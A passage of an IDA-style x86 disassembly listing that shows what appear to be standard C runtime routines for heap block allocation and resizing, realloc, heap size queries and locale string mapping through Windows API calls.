lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_4039C3
; ---------------------------------------------------------------------------
loc_4039A3: ; CODE XREF: sub_403855+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_4039B9
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_4039B9: ; CODE XREF: sub_403855+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_4039C3: ; CODE XREF: sub_403855+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_4039CC: ; CODE XREF: sub_403855+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_4039E1
; ---------------------------------------------------------------------------
loc_4039DE: ; CODE XREF: sub_403855+DE�j
mov edx, [ebp+arg_4]
loc_4039E1: ; CODE XREF: sub_403855+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_403B2C
; ---------------------------------------------------------------------------
loc_4039F0: ; CODE XREF: sub_403855+50�j
; sub_403855+5A�j
xor eax, eax
jmp loc_403B2F
; ---------------------------------------------------------------------------
loc_4039F7: ; CODE XREF: sub_403855+47�j
jge loc_403B2C
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_403A22
push 3Fh
pop esi
loc_403A22: ; CODE XREF: sub_403855+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_403AAC
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_403A3B
push 3Fh
pop esi
loc_403A3B: ; CODE XREF: sub_403855+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_403A85
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_403A66
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_403A82
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_403A82
; ---------------------------------------------------------------------------
loc_403A66: ; CODE XREF: sub_403855+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_403A82
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_403A82: ; CODE XREF: sub_403855+208�j
; sub_403855+20F�j ...
mov ebx, [ebp+arg_4]
loc_403A85: ; CODE XREF: sub_403855+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_403AAC
push 3Fh
pop esi
loc_403AAC: ; CODE XREF: sub_403855+1D1�j
; sub_403855+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_403B23
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_403AFA
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403AF2
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_403AF2: ; CODE XREF: sub_403855+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_403B1A
; ---------------------------------------------------------------------------
loc_403AFA: ; CODE XREF: sub_403855+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403B10
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_403B10: ; CODE XREF: sub_403855+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_403B1A: ; CODE XREF: sub_403855+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_403B23: ; CODE XREF: sub_403855+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_403B2C: ; CODE XREF: sub_403855+196�j
; sub_403855:loc_4039F7�j
xor eax, eax
inc eax
loc_403B2F: ; CODE XREF: sub_403855+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_403855 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B34 proc near ; CODE XREF: sub_402F43+17�p
; sub_403E30+74�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov ecx, [ebp+arg_0]
mov eax, dword_4074AC
mov edx, dword_4074B0
add ecx, 17h
and ecx, 0FFFFFFF0h
push ebx
mov [ebp+var_10], ecx
sar ecx, 4
push esi
lea eax, [eax+eax*4]
push edi
dec ecx
cmp ecx, 20h
lea edi, [edx+eax*4]
mov [ebp+var_4], edi
jge short loc_403B71
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_403B7E
; ---------------------------------------------------------------------------
loc_403B71: ; CODE XREF: sub_403B34+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_8], eax
loc_403B7E: ; CODE XREF: sub_403B34+3B�j
mov eax, dword_4074B8
mov ebx, eax
mov [ebp+var_C], esi
cmp ebx, edi
jmp short loc_403BA0
; ---------------------------------------------------------------------------
loc_403B8C: ; CODE XREF: sub_403B34+6F�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_403BA5
add ebx, 14h
cmp ebx, [ebp+var_4]
loc_403BA0: ; CODE XREF: sub_403B34+56�j
mov [ebp+arg_0], ebx
jb short loc_403B8C
loc_403BA5: ; CODE XREF: sub_403B34+64�j
cmp ebx, [ebp+var_4]
jnz short loc_403BCE
mov ebx, edx
jmp short loc_403BBF
; ---------------------------------------------------------------------------
loc_403BAE: ; CODE XREF: sub_403B34+90�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_403BC6
add ebx, 14h
loc_403BBF: ; CODE XREF: sub_403B34+78�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_403BAE
loc_403BC6: ; CODE XREF: sub_403B34+86�j
cmp ebx, eax
jz loc_403C62
loc_403BCE: ; CODE XREF: sub_403B34+74�j
; sub_403B34+170�j
mov dword_4074B8, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_403BF5
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_403C2B
loc_403BF5: ; CODE XREF: sub_403B34+AB�j
mov edx, [eax+0C4h]
and edx, [ebp+var_8]
and [ebp+var_4], 0
lea ecx, [eax+44h]
mov esi, [ecx]
and esi, [ebp+var_C]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_403C28
loc_403C11: ; CODE XREF: sub_403B34+F2�j
mov edx, [ecx+84h]
and edx, [ebp+var_8]
inc [ebp+var_4]
add ecx, 4
mov edi, [ecx]
and edi, esi
or edx, edi
jz short loc_403C11
loc_403C28: ; CODE XREF: sub_403B34+DB�j
mov edx, [ebp+var_4]
loc_403C2B: ; CODE XREF: sub_403B34+BF�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_403CB4
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_403CB4
; ---------------------------------------------------------------------------
loc_403C56: ; CODE XREF: sub_403B34+131�j
cmp dword ptr [ebx+8], 0
jnz short loc_403C67
add ebx, 14h
mov [ebp+arg_0], ebx
loc_403C62: ; CODE XREF: sub_403B34+94�j
cmp ebx, [ebp+var_4]
jb short loc_403C56
loc_403C67: ; CODE XREF: sub_403B34+126�j
cmp ebx, [ebp+var_4]
jnz short loc_403C92
mov ebx, edx
jmp short loc_403C79
; ---------------------------------------------------------------------------
loc_403C70: ; CODE XREF: sub_403B34+14A�j
cmp dword ptr [ebx+8], 0
jnz short loc_403C80
add ebx, 14h
loc_403C79: ; CODE XREF: sub_403B34+13A�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_403C70
loc_403C80: ; CODE XREF: sub_403B34+140�j
cmp ebx, eax
jnz short loc_403C92
call sub_403698
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_403CAA
loc_403C92: ; CODE XREF: sub_403B34+136�j
; sub_403B34+14E�j
push ebx
call sub_40374F
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz loc_403BCE
loc_403CAA: ; CODE XREF: sub_403B34+15C�j
xor eax, eax
jmp loc_403E2B
; ---------------------------------------------------------------------------
loc_403CB1: ; CODE XREF: sub_403B34+182�j
shl ecx, 1
inc edi
loc_403CB4: ; CODE XREF: sub_403B34+111�j
; sub_403B34+120�j
test ecx, ecx
jge short loc_403CB1
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_403CD5
push 3Fh
pop esi
loc_403CD5: ; CODE XREF: sub_403B34+19C�j
cmp esi, edi
jz loc_403DDE
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_403D41
cmp edi, 20h
mov ebx, 80000000h
jge short loc_403D15
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_403D3E
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_403D41
; ---------------------------------------------------------------------------
loc_403D15: ; CODE XREF: sub_403B34+1B9�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_403D3E
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_403D41
; ---------------------------------------------------------------------------
loc_403D3E: ; CODE XREF: sub_403B34+1D5�j
; sub_403B34+1FD�j
mov ebx, [ebp+arg_0]
loc_403D41: ; CODE XREF: sub_403B34+1AF�j
; sub_403B34+1DF�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_403DEA
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_403DDB
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_403DB2
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_403DA0
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_403DA0: ; CODE XREF: sub_403B34+25F�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_403DDB
; ---------------------------------------------------------------------------
loc_403DB2: ; CODE XREF: sub_403B34+259�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_403DC5
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_403DC5: ; CODE XREF: sub_403B34+282�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_403DDB: ; CODE XREF: sub_403B34+247�j
; sub_403B34+27C�j
mov ecx, [ebp+var_8]
loc_403DDE: ; CODE XREF: sub_403B34+1A3�j
test ecx, ecx
jz short loc_403DED
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_403DED
; ---------------------------------------------------------------------------
loc_403DEA: ; CODE XREF: sub_403B34+223�j
mov ecx, [ebp+var_8]
loc_403DED: ; CODE XREF: sub_403B34+2AC�j
; sub_403B34+2B4�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_403E23
cmp ebx, dword_4074A8
jnz short loc_403E23
mov ecx, [ebp+var_4]
cmp ecx, dword_4074C0
jnz short loc_403E23
and dword_4074A8, 0
loc_403E23: ; CODE XREF: sub_403B34+2D3�j
; sub_403B34+2DB�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_403E2B: ; CODE XREF: sub_403B34+178�j
pop edi
pop esi
pop ebx
leave
retn
sub_403B34 endp
; =============== S U B R O U T I N E =======================================
sub_403E30 proc near ; CODE XREF: sub_402A23+34�p
; sub_402A23+49�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
test ebx, ebx
push ebp
push edi
jnz short loc_403E4A
push [esp+0Ch+arg_4]
call sub_402FB5
pop ecx
jmp loc_403F8E
; ---------------------------------------------------------------------------
loc_403E4A: ; CODE XREF: sub_403E30+9�j
push esi
mov esi, [esp+10h+arg_4]
test esi, esi
jnz short loc_403E5F
push ebx
call sub_402F0B
pop ecx
jmp loc_403F8B
; ---------------------------------------------------------------------------
loc_403E5F: ; CODE XREF: sub_403E30+21�j
cmp dword_407704, 3
jnz loc_403F57
loc_403E6C: ; CODE XREF: sub_403E30+11B�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_403F39
push ebx
call sub_403355
mov ebp, eax
test ebp, ebp
pop ecx
jz loc_403F18
cmp esi, dword_4074B4
ja short loc_403ED8
push esi
push ebx
push ebp
call sub_403855
add esp, 0Ch
test eax, eax
jz short loc_403EA3
mov edi, ebx
jmp short loc_403ED4
; ---------------------------------------------------------------------------
loc_403EA3: ; CODE XREF: sub_403E30+6D�j
push esi
call sub_403B34
mov edi, eax
test edi, edi
pop ecx
jz short loc_403ED8
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_403EBA
mov eax, esi
loc_403EBA: ; CODE XREF: sub_403E30+86�j
push eax
push ebx
push edi
call sub_402FD0
push ebx
call sub_403355
mov ebp, eax
push ebx
push ebp
call sub_403380
add esp, 18h
loc_403ED4: ; CODE XREF: sub_403E30+71�j
test edi, edi
jnz short loc_403F14
loc_403ED8: ; CODE XREF: sub_403E30+5E�j
; sub_403E30+7E�j
test esi, esi
jnz short loc_403EDD
inc esi
loc_403EDD: ; CODE XREF: sub_403E30+AA�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_407700
call ds:dword_4050C8 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_403F14
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_403F02
mov eax, esi
loc_403F02: ; CODE XREF: sub_403E30+CE�j
push eax
push ebx
push edi
call sub_402FD0
push ebx
push ebp
call sub_403380
add esp, 14h
loc_403F14: ; CODE XREF: sub_403E30+A6�j
; sub_403E30+C6�j
test ebp, ebp
jnz short loc_403F35
loc_403F18: ; CODE XREF: sub_403E30+52�j
test esi, esi
jnz short loc_403F1D
inc esi
loc_403F1D: ; CODE XREF: sub_403E30+EA�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push ebx
push 0
push dword_407700
call ds:dword_4050D0 ; RtlReAllocateHeap
mov edi, eax
loc_403F35: ; CODE XREF: sub_403E30+E6�j
test edi, edi
jnz short loc_403F53
loc_403F39: ; CODE XREF: sub_403E30+41�j
cmp dword_4074A4, 0
jz short loc_403F53
push esi
call sub_404540
test eax, eax
pop ecx
jnz loc_403E6C
jmp short loc_403F8B
; ---------------------------------------------------------------------------
loc_403F53: ; CODE XREF: sub_403E30+107�j
; sub_403E30+110�j
mov eax, edi
jmp short loc_403F8D
; ---------------------------------------------------------------------------
loc_403F57: ; CODE XREF: sub_403E30+36�j
; sub_403E30+159�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_403F77
test esi, esi
jnz short loc_403F63
inc esi
loc_403F63: ; CODE XREF: sub_403E30+130�j
push esi
push ebx
push 0
push dword_407700
call ds:dword_4050D0 ; RtlReAllocateHeap
test eax, eax
jnz short loc_403F8D
loc_403F77: ; CODE XREF: sub_403E30+12C�j
cmp dword_4074A4, 0
jz short loc_403F8D
push esi
call sub_404540
test eax, eax
pop ecx
jnz short loc_403F57
loc_403F8B: ; CODE XREF: sub_403E30+2A�j
; sub_403E30+121�j
xor eax, eax
loc_403F8D: ; CODE XREF: sub_403E30+125�j
; sub_403E30+145�j ...
pop esi
loc_403F8E: ; CODE XREF: sub_403E30+15�j
pop edi
pop ebp
pop ebx
retn
sub_403E30 endp
; =============== S U B R O U T I N E =======================================
sub_403F92 proc near ; CODE XREF: sub_402A23+7�p
arg_0 = dword ptr 4
cmp dword_407704, 3
push esi
jnz short loc_403FB6
mov esi, [esp+4+arg_0]
push esi
call sub_403355
test eax, eax
pop ecx
jz short loc_403FB3
mov eax, [esi-4]
sub eax, 9
pop esi
retn
; ---------------------------------------------------------------------------
loc_403FB3: ; CODE XREF: sub_403F92+17�j
push esi
jmp short loc_403FBA
; ---------------------------------------------------------------------------
loc_403FB6: ; CODE XREF: sub_403F92+8�j
push [esp+4+arg_0]
loc_403FBA: ; CODE XREF: sub_403F92+22�j
push 0
push dword_407700
call ds:dword_4050D4 ; RtlSizeHeap
pop esi
retn
sub_403F92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FCA proc near ; CODE XREF: sub_402B7B+C5�p
; sub_402B7B+ED�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push 38h
push offset stru_405CF0
call __SEH_prolog
xor ebx, ebx
cmp dword_407498, ebx
jnz short loc_404018
push ebx
push ebx
xor esi, esi
inc esi
push esi
push offset dword_405CEC
push 100h
push ebx
call ds:dword_4050E0 ; LCMapStringW
test eax, eax
jz short loc_404003
mov dword_407498, esi
jmp short loc_404018
; ---------------------------------------------------------------------------
loc_404003: ; CODE XREF: sub_403FCA+2F�j
call ds:dword_405090 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_404018
mov dword_407498, 2
loc_404018: ; CODE XREF: sub_403FCA+14�j
; sub_403FCA+37�j ...
cmp [ebp+arg_C], ebx
jle short loc_404038
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_404023: ; CODE XREF: sub_403FCA+61�j
dec ecx
cmp [eax], bl
jz short loc_404030
inc eax
cmp ecx, ebx
jnz short loc_404023
or ecx, 0FFFFFFFFh
loc_404030: ; CODE XREF: sub_403FCA+5C�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+arg_C], eax
loc_404038: ; CODE XREF: sub_403FCA+51�j
mov eax, dword_407498
cmp eax, 2
jz loc_404222
cmp eax, ebx
jz loc_404222
cmp eax, 1
jnz loc_404255
xor edi, edi
mov [ebp+var_2C], edi
mov [ebp+var_38], ebx
mov [ebp+var_34], ebx
cmp [ebp+arg_18], ebx
jnz short loc_40406F
mov eax, dword_407490
mov [ebp+arg_18], eax
loc_40406F: ; CODE XREF: sub_403FCA+9B�j
push ebx
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
xor eax, eax
cmp [ebp+arg_1C], ebx
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call ds:dword_4050DC ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_30], esi
cmp esi, ebx
jz loc_404255
mov [ebp+ms_exc.disabled], 1
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_402310
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_4040DB
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_404B0C
xor ebx, ebx
mov [ebp+var_1C], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_2C]
mov esi, [ebp+var_30]
loc_4040DB: ; CODE XREF: sub_403FCA+F4�j
cmp [ebp+var_1C], ebx
jnz short loc_4040FC
lea eax, [esi+esi]
push eax
call sub_402FB5
pop ecx
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_404255
mov [ebp+var_38], 1
loc_4040FC: ; CODE XREF: sub_403FCA+114�j
push esi
push [ebp+var_1C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_4050DC ; MultiByteToWideChar
test eax, eax
jz loc_4041FF
push ebx
push ebx
push esi
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4050E0 ; LCMapStringW
mov edi, eax
mov [ebp+var_2C], edi
cmp edi, ebx
jz loc_4041FF
test byte ptr [ebp+arg_4+1], 4
jz short loc_40416B
cmp [ebp+arg_14], ebx
jz loc_4041FF
cmp edi, [ebp+arg_14]
jg loc_4041FF
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4050E0 ; LCMapStringW
jmp loc_4041FF
; ---------------------------------------------------------------------------
loc_40416B: ; CODE XREF: sub_403FCA+172�j
mov [ebp+ms_exc.disabled], 2
lea eax, [edi+edi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_402310
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_4041A9
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_404B0C
xor ebx, ebx
mov [ebp+var_20], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_2C]
mov esi, [ebp+var_30]
loc_4041A9: ; CODE XREF: sub_403FCA+1C2�j
cmp [ebp+var_20], ebx
jnz short loc_4041C6
lea eax, [edi+edi]
push eax
call sub_402FB5
pop ecx
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_4041FF
mov [ebp+var_34], 1
loc_4041C6: ; CODE XREF: sub_403FCA+1E2�j
push edi
push [ebp+var_20]
push esi
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4050E0 ; LCMapStringW
test eax, eax
jz short loc_4041FF
push ebx
push ebx
cmp [ebp+arg_14], ebx
jnz short loc_4041E9
push ebx
push ebx
jmp short loc_4041EF
; ---------------------------------------------------------------------------
loc_4041E9: ; CODE XREF: sub_403FCA+219�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_4041EF: ; CODE XREF: sub_403FCA+21D�j
push edi
push [ebp+var_20]
push ebx
push [ebp+arg_18]
call ds:dword_40508C ; WideCharToMultiByte
mov edi, eax
loc_4041FF: ; CODE XREF: sub_403FCA+149�j
; sub_403FCA+168�j ...
cmp [ebp+var_34], ebx
jz short loc_40420D
push [ebp+var_20]
call sub_402F0B
pop ecx
loc_40420D: ; CODE XREF: sub_403FCA+238�j
cmp [ebp+var_38], ebx
jz short loc_40421B
push [ebp+var_1C]
call sub_402F0B
pop ecx
loc_40421B: ; CODE XREF: sub_403FCA+246�j
mov eax, edi
jmp loc_40437D
; ---------------------------------------------------------------------------
loc_404222: ; CODE XREF: sub_403FCA+76�j
; sub_403FCA+7E�j
mov [ebp+var_28], ebx
xor edi, edi
mov [ebp+var_3C], ebx
cmp [ebp+arg_0], ebx
jnz short loc_404237
mov eax, dword_407480
mov [ebp+arg_0], eax
loc_404237: ; CODE XREF: sub_403FCA+263�j
cmp [ebp+arg_18], ebx
jnz short loc_404244
mov eax, dword_407490
mov [ebp+arg_18], eax
loc_404244: ; CODE XREF: sub_403FCA+270�j
push [ebp+arg_0]
call sub_404900
pop ecx
mov [ebp+var_40], eax
cmp eax, 0FFFFFFFFh
jnz short loc_40425C
loc_404255: ; CODE XREF: sub_403FCA+87�j
; sub_403FCA+CD�j ...
xor eax, eax
jmp loc_40437D
; ---------------------------------------------------------------------------
loc_40425C: ; CODE XREF: sub_403FCA+289�j
cmp eax, [ebp+arg_18]
jz loc_404353
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_404943
add esp, 18h
mov [ebp+var_28], eax
cmp eax, ebx
jz short loc_404255
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4050D8 ; LCMapStringA
mov esi, eax
mov [ebp+var_24], esi
cmp esi, ebx
jz loc_404342
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_402310
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_44], edi
push esi
push ebx
push edi
call sub_4048A0
add esp, 0Ch
jmp short loc_4042D3
; ---------------------------------------------------------------------------
loc_4042C3: ; DATA XREF: .rdata:stru_405CF0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4042C7: ; DATA XREF: .rdata:stru_405CF0�o
mov esp, [ebp+ms_exc.old_esp]
call sub_404B0C
xor ebx, ebx
xor edi, edi
loc_4042D3: ; CODE XREF: sub_403FCA+2F7�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
cmp edi, ebx
jnz short loc_4042FE
push [ebp+var_24]
call sub_402FB5
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_40431B
push [ebp+var_24]
push ebx
push edi
call sub_4048A0
add esp, 0Ch
mov [ebp+var_3C], 1
loc_4042FE: ; CODE XREF: sub_403FCA+30F�j
push [ebp+var_24]
push edi
push [ebp+arg_C]
push [ebp+var_28]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4050D8 ; LCMapStringA
mov [ebp+var_24], eax
cmp eax, ebx
jnz short loc_40431F
loc_40431B: ; CODE XREF: sub_403FCA+31E�j
xor esi, esi
jmp short loc_404345
; ---------------------------------------------------------------------------
loc_40431F: ; CODE XREF: sub_403FCA+34F�j
push [ebp+arg_14]
push [ebp+arg_10]
lea eax, [ebp+var_24]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_40]
call sub_404943
add esp, 18h
mov esi, eax
neg esi
sbb esi, esi
neg esi
jmp short loc_404345
; ---------------------------------------------------------------------------
loc_404342: ; CODE XREF: sub_403FCA+2D0�j
mov esi, [ebp+var_48]
loc_404345: ; CODE XREF: sub_403FCA+353�j
; sub_403FCA+376�j
cmp [ebp+var_3C], ebx
jz short loc_40436D
push edi
call sub_402F0B
pop ecx
jmp short loc_40436D
; ---------------------------------------------------------------------------
loc_404353: ; CODE XREF: sub_403FCA+295�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4050D8 ; LCMapStringA
mov esi, eax
loc_40436D: ; CODE XREF: sub_403FCA+37E�j
; sub_403FCA+387�j
cmp [ebp+var_28], ebx
jz short loc_40437B
push [ebp+var_28]
call sub_402F0B
pop ecx
loc_40437B: ; CODE XREF: sub_403FCA+3A6�j
mov eax, esi
loc_40437D: ; CODE XREF: sub_403FCA+253�j
; sub_403FCA+28D�j
lea esp, [ebp-54h]
call __SEH_epilog
retn
sub_403FCA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404386 proc near ; CODE XREF: sub_402B7B+A1�p
; sub_404CC2+4F�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
